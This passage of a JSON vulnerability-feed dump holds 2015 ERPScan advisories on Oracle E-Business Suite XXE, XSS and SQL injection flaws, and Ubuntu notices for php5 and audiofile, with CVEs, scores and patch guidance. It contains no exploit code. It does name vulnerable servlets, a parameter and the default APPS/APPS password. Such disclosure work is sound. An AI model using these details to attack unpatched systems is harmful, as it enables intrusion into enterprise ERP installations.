software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}